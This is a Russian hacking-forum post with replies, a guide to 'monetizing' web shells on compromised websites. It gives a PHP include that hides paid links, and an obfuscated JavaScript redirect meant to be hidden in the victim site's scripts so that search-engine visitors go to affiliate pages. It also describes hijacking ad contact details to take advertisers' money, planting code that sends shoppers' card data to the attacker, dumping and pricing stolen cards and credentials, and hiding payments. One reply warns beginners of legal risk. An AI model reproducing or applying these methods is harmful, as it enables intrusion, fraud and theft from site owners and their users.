Описание свежего мануал по монетизации шеллов на линкобирже находится на сайте: http://kidsec.ru Сам мануал больше не поддерживается и стал полностью бесплатным, последнюю версию от 06.2015 года, можно скачать по ссылке: http://kidsec.ru/msh/newmonshe.zip Я далеко не писатель поэтому мне тяжело правильно изложить свою мысль так что сильно за это не пинайте. И так я решил более подробно расписать способы монетизации шеллов. Так не хочу тут вмещать большую пред историю поэтому сразу начну. Я разделил способы на 2 категории это соответственно траффистые и с высокими показателями ТиЦ и ПР. И так поехали: Высокие показатели ТиЦ и ПР. Биржи ссылок и статей: Конечно же первый способ это биржи ссылок, рассмотрим только гигантов этой процветающей ниши - Сапу и Линкфид. Глупо создавать папки в корне сайта с этими 20-ти символьными названиями которые требует сапа и линкфид, можно же нанять программиста и сделать более простой код ... Ладно шучу не кого нанимать не надо, все давно уже сделано и изюзанно, так что просто берем с тарелочки. Эм код не поместился но я залил на sendspace: сылка И так для начала заменяем слова ВАШ КОД ЗДЕСЬ (если точнее они находяться на 122 и 318 строчке), на ваш код в бирже, его соответственно берем в самих биржах для каждого аккаунта он разный. Сохраняем этот код в файл и пихаем по глубже так что бы админы не докопались, только ж не забудьте куда положили. Теперь ищем место где будут наши ссылки и вставляем в него следующий код: <?php include ($_SERVER['DOCUMENT_ROOT'].'/images/img.php'); echo __banner(); ?> Вместо /images/img.php соответственно пишем путь к нашему скрипту. Теперь ваши ссылки будут выводиться под тэгом <div style="position:absolute;left:-2000px;width:2000px"></div> То есть на сайте ваши ссылки видны не будут, это для того что бы нас не запалили админы. Администрация Линкфид вобще на это не жалуется, но вот в сапе если поступит абуза на вас то просто сайт уйдет в режим "Не прошел модерацию" пока не снимите этот самый тэг, а главное доход то с сайта все равно идет. Для статей есть хороший сайт liex.ru (его юзать если вы уже установили сапу и линкфид на сайт), если нет получается установить сапу и линкфид по каким либо причинам тогда идем в миралинкс там выше цены и спрос, но не принимают сайты с установленными кодами бирж ссылок. gogetlinks.net: Есть еще прекрасный сервис называется gogetlinks.net а прелесть его в том, что мы продаем вечные ссылки примерно от 200 рублей за штучку (это если тиц от 100), единственное условие в индексе яндекса должно быть больше 100 страниц, ну и конечно они говорят что не принимают тоже сайты с биржами ссылок (но это все трындежь, у меня лично все приняли даже не заикнулись). Продавать на одной странице можно только одну ссылку. Спрос большой, если сайт в ЯК и средняя цена то приходит от 20 заявок в день, а если еще обратным поисков пошурудить, то можно и все 40. Единственный и огромный минус там холд в 3 месяца, в смысле после регистрации можно заказать выплату только через 3 месяца, это плохо но не смертельно, можно купить аккаунт или найти СЕОшника который будет под процент все ставить выводить и т.д. UPDATE 03.02.2011: В гогетлинкс ввели дополнительную проверку, теперь нужно подтвердить заявку на емейле указном в WHOIS при регистрации сайта или иметь перс аттестат. Но не забываем, что есть альтернатива: REFAD.NET не тестил но отзывы хорошие ... Разработка скриптов: Я лично ставлю в сапу только сайты с тиц от 100, в остальные запихиваю свой скрипт (я его вылаживать не собираюсь, так как нормально оплатил за него), он чем то похож на систему бирж, в footer сайта вставляется код который принимает запросы, запросы отдаются с главного скрипта находящегося у меня на сервере. Для чего это нужно, да все просто если вы продвигаете какой либо сайт, просто впихиваете ссылку на свой сайт в скрипт и он рассылает по всем сайтам, и то есть вы сразу имеете ссылки со всех сайтов взломанными вами мелких сайтов, у меня их не малое количество поэтому получается не хилый проспам, а главное это не гавносайты которые прогоняются тем же хрумером. По этому получаем не хилое продвижение + тиц. Если же вы не увлекаетесь белым СЕО то данную сеть можно продать, или предоставлять услуги 1 ссылка на 1000 сайтах = 50=100$ если все правильно организовать то не хилый приток желающих нахлынет. Дорвеи: Дорвеи описывать не собираюсь, потому что в рунете из за огромного количества хороших белых сайтов и быстро развивающихся АГС систем яндекса, они если не вымерли то находятся на грани. Можно конечно гнать траффик с гугла, но конверт в разы меньше и тут нужно брать только количеством, а это вобще не интересно. Честно вам скажу лучше не беритесь, если и работать с дорами то только в бурж. Хотя в бурж впихнуться очень тяжело, как минимум вам нужен СЕОшник который готов работать 50 на 50, на вашем ломе, но люди которые сейчас на это соглашаются в основном нюбы которые будут вешать вам шлемы "та я пальцем двери открываю" и т.д., потому что тем кто действительно могут войти в топ и т.д., им попросту не нужен партнер они могут купить лом и так и им по просто не зачем с вами делиться. Траффистые. Редирект и баннеры: У меня слёзы проворачиваются когда я вижу на больших порталах как люди ставят ифреймы на какую то связку и просто гробят шелл. Зачем нам те копейки траффика на связку если можно получить намного больше проффит на живом траффике с этого сайта. И так для начала смотрим тематику сайта, если это более коммерческие - страховка, авто, недвижимость можно гнать траффик чисто на партнерку допустим тот же "Каско", если развлекательный, адалт и т.д. можно сливать на платники по секс знакомствам (сейчас их уже тысячи), различных онлайн игр с оплатой за регистрацию и т.д. Для этого для начала нужно изучить сайт, если на нем есть тизерные блоки, например слева и справа, регистрируемся в тизернет или подобных составляем оформление точно такое же, как и на сайте и заменяем допустим левый блок своим (администраторы не так быстро замечают подставу иногда даже сливается месяцами). Дальше смотрим баннеры какие установлены на сайте добавляем свои (в большей части баннеры выводятся с помощью кмс) поэтому мы просто добавляем свои баннеры которые будут лить на наши партнерки. Если это варезник, то просто берем 1 файл любой, желательно назвать его допустим soft_358.rar заливаем на депозит и летибит, и в шаблон сайта вставляем примерно следующее: Скачать эту программу через леттибит и соответственно ссылка и тоже самое с депозит. Тут профит конечно же зависит от посещаемости сайта. Есть еще платнички файловые, вобщем думаю тут объяснять не надо, там более приманчивая кнопка (Скачать на большой скорости и т.д. и т.п.) после того как человек скачивает и пытается установить то ему высвечивает отправьте смс для того что установить и вам конечно же падает процент от этой смски. Так идем дальше есть еще жестокий способ, это редирект. Если поставить сразу редирект на какую то страницу то конечно же администрация быстро обламает ваши затеи. Для этого используем простейщий javascript: PHP: function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"</s'+'cript>')}else{document.write('.')}}R(); Из кода мы конечно же видим, что любой человек пришедший из google, yandex, yahoo и т.д. вобщем то есть из поисковика пересылается на нашу страницу которую нужно указать в скрипте. Админ сайт логично заходит на свой сайт через закладки и его не редиректнит и по статистике его сайта не упадет посещаемость. Лучше еще запрятать этот самый код в уже существующий javascript, просто открываем страницу смотрим какие .js скрипты вызываются на всех страницах, добавляем в конце этот код и получаем профит. Если вы пытаетесь монетизировать большие порталы с посещаемостью от 20к, тут лучше не спешить, по подробнее изучить все разделы сайта (тут действует поговорка 7 раз отмерь, 1 раз отрежь), у меня некоторые порталы уже по пол года держутся хоть и приносят 20-50$, зато за месяцы накапливается не хилый доход и это в сотню раз лучше, чем бы я туда просто впихнул фрейм и получил бы максимум 50$ фрейм бы убрали и несли бы мне шелл. Подмена: Это уже можно считать за не большой развод, и тут нужна сноровка при общении (хотя как посмотришь на раздел Кидалы разных форумов, то сразу видно что это у вас хорошо получается). И так баннер на портале с посещаемость 10к+ стоит от 500$ в месяц, у каждого сайта есть страничка где они предлагают места под баннера, расценку и внизу контактную информацию. Ну конечно же мы контактную информацию меняем на свою и сами принимаем заказы. Желательно просить деньги в Яндекс.деньгах, потому что их легко перевести на вебмоней и дальше можно не бояться, что нас забанят или что то такое. Если нет Яндекс.денег то тут уже вольная фантазия можно зарегистрировать кошелек через дедик, после получения денег перевести их на другую платежную систему, а от туда уже обратно на вебмоней только на свой кошелек. Конечно же можно подменять информацию не только в разделе реклама, но все зависит от сайта и его тематики, думаю мысль вы поняли дальше найдете сами. Так же если это буржуйский сайт, допустим какой то интернет-магазинчик пишем не большой пхп шпиончик, добавляем в скрипт что бы при заполнение человеком данных для покупки, все данные и соответственно информация о кредитке высылались вам куда то на сервер. Можно и не кредитку, а любая интересующая вас инфа с пользователей этого сайта. Слив базы данных и другое: Кредитки: Ну за кредитки тут все ясно, если вы взломали буржуский магазинчик, то дампим таблицу 'orders' и ищем там кредитки. USA кредитки довольно дешевые сейчас, больше ценится европа. Очень желательно что бы кроме номера и exp кредитки был еще CVV2 код это трёх значное число. Если в базе его нет, то такой дамп будет стоить в несколько раз дешевле, кстати о расценках USA с cvv2 примерно от 300$ за 1к (если хороший валид), европа (зависит от стран и валида) примерно от 1к$ за 1к. Тут я рассказывать не буду на теме кредиток останавливаться очень на долго, тем более накапливать себе конкурентов. Мейлы: Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей, если зашифрован то тут уже ищем проги для масс брута. Рассылка: Во многих CMS есть рассылка писем от имени администратора, так же можно разослать письма с рекламой вашей партнерки. Сплоги: Еще если это опять же варезник или адалт сайт, сливаем базу данных именно постов сайта, прогоняем ее через какой то синомайзер и получаем самый, что не на есть "сплог" (подробнее о слогах можно найти в гугле), регаем сайтик ставим такую же CMS как и у взломанного сайта, заливаем дамп базы и опля мы имеем не плохой траффик который потом можно монетизировать, как душе угодно. Порталы: Обычно сайты с хорошим траффиком это различные порталы написанные на самописнном движке, или же умело переделанные под известные вордпрессы, ДЛЕ и т.д. Такие движки и шаблоны хорошо ценятся среди СЕОшников, я бы сам не прочь купить какой то движок городского портала или что то подобное, это экономит не только деньги а и время, нервы. Можно выгодно продать ... Если честно я до сих пор поражаюсь в ценах на шеллы, по моим меркам они должны стоить в разы дороже ... Вот и подошла к концу моя не большая статейка, если будут какие то вопросы или дополнению - выслушаю, исправлю. Спасибо вобщем за внимание. Автор: FlooP1k специально для Античат.
хмы к чему вы это написали? Аналогичная? Чем, не чего похожего я не вижу ... Ява скрипт не может не работать, так как код перепроверил все нормально, может вы его не правильно вызвали?
статья гуд, но смутил один момент, касаемый редиректа. при таком подходе сайт вылетает из индекса довльно быстро.
Статья очень хорошая. Но не согласен насчет скрипт удаленного размещения ссылок - точнее с тем то что это о дорого стоит. Сам года 2 назад заказывал - состоит из 2-ух файлов php. Один у себя на хостинге размещаешь, и указываешь путь до второго, второй размещаешь на жертве и инклудишь в футер шаблона. Стоимость 20wmz макс. Автор есть сложность с поиском покупателей на базы карточек с инет-шопов? Если не сложно ответь в личку.
Не ну смотря как написать скрипт если просто размешалась ссылка в футере то тогда да, а мой скрипт как сапа определяет страницы и футер на одной странице показывают одну ссылку, а на другой другую ...
FlooP1k как бабло с бирж выводим? и что насчёт абуз от админов сайта? http://www.linkfeed.ru/blog/?p=203
Вобще в сапе если абузу подаст один из оптимизаторов, то ваш сайт уйдет в статус "Не промодерирован", а в качестве ошибки укажут что нужно сделать видимые ссылки (прикол в том что деньги и дальше продолжают капать). А линкфид это вобще смешно, мне кажется самая немодерируемая биржа ссылок, там хоть сайт vkontakt добавь, им все равно не одна неделя понадобиться что бы понять что произошло ...
а ну я незнаю, у меня пару раз было такое что сайт с акккаунта просто пропал, пытаешься добавить еще раз пишет сайт уже есть в системе ... Может из за абузы админы переносят к нему в аккаунт или что то такое, хотя это как то глупо на счет этого я незнаю (
Для gogetlinks не нужен код, а трастлинком не пользовался еще незнаю ... Там в принципе не сложный код можно переписать под трастлинк, но у меня времени нет и я не программист для меня это все долго и нудно будет (
отвечал уже в пм ... по правилам бирж код должен быть между тэгами <html>и</html> так что настраивайте
Вопрос, как монетизировать EDU шеллы? Т.е. какая цена на них, я так понял, они ценятся выше обычных? И смежный вопрос, сайты в нац.учебных зонах типа edu.jp, edu.lb ценятся также, как и EDU, либо выше обычных, либо как обычные?
Очень ценятся зоны .edu, .mil, .gov ... Монетизируют исключительно дорвеями и различными СЕО штучками. Цена обычно от 80$. Самому лучше не пытаться монетизировать, врядли у вас что то получиться в большинстве случаем вы просто потеряете шелл. edu.jp, edu.lb насколько я знаю ценятся как и обычные шеллы ....
Проблема многих форумов на "хаккерскую" тематику заключается в том, что люди, обладающие неким, явно недостаточным опытом даже для собственной успешной деятельности, начинают учить других. Это серьёзная проблема - так как то, что обсуждается в этой статье - относительно серьёзная область, которая не терпит "дилетантского" подхода. Я выкупаю значительный объем шеллов каждый день. И ежедневно я вычищаю с площадок мусор, неудачную попытку поставить какую-либо говнобиржу, ифрейм, или восстанавливаю площадки, загубленные неправильным инклудом. Это всё - результат того, что человек набрался отрывочных знаний по подобным статьям, и пошел нарушать закон. Возможно, в большинстве случаев это никак не отразится на их дальнейшей судьбе, но на многих площадках люди оставляют кучу следов. Свои хостинги, идентификаторы бирж, порой кошельки платежых систем, айпи тдс, и прочее. В сумме - это достаточный набор для выяснения личности кулхакера, особенно учитывая тот фактор, что человек, который совершал такие "неквалифицированные" действия, вряд ли имеет подобающую инфраструктуру для этого - сейчас я говорю об обеспечении собственной безопасности. Эта тема - яркий пример всего вышеописанного. Например, вот: Человек явно не имел никакого опыта работы с биржами ссылок, но сразу лезет ставить ссылки на чужую площадку. Кстати, не читая ни справок, ни форума соответствующей биржи, где уже давно решено большинство типичных проблем. Или: Что можно ответить на такой вопрос? Можно, конечно, написать пару параграфов текста об особенностях работы некоторых поисковых систем, но какой толк? Человек не поймет, или не сможет воспользоваться этой информацией - у него нет нужной информационной базы в голове, иначе бы такого вопроса не возникло в принципе. Друзья, мой вам совет: не лезьте пока в это. Лучше, читайте максимум информации о том, каким образом вообще можно заработать деньги в интернете. Читайте, думайте, делайте, анализируйте. И начните лучше с белого. Сделайте несколько сайтов, продвиньте их, попробуйте монетизировать. Попробуйте сделать это правильно, чтобы появился результат. И потом, когда все встанет на свои места - только тогда следует задуматься о неких дополнительных "бонусах", которые можно получить, используя черную оптимизацию, и шеллы как инструмент для этого. Нельзя сразу сесть за штурвал, к примеру, истребителя и полететь на перехват. Сначала нужно научится летать, например, на кукурузнике. Потом - на чем-нибудь из малой гражданской авиации, и только потом - садится за руль боевой машины. Иначе, можно нажать не ту кнопку, и произойдет взрыв. В наших терминах - к вам придут, заберут все оборудование, а после дадут два года условно. Это в лучшем случае. Подумайте, это - не пустые слова. И лучше не лезьте, если чувствуете, что что-то не понимаете.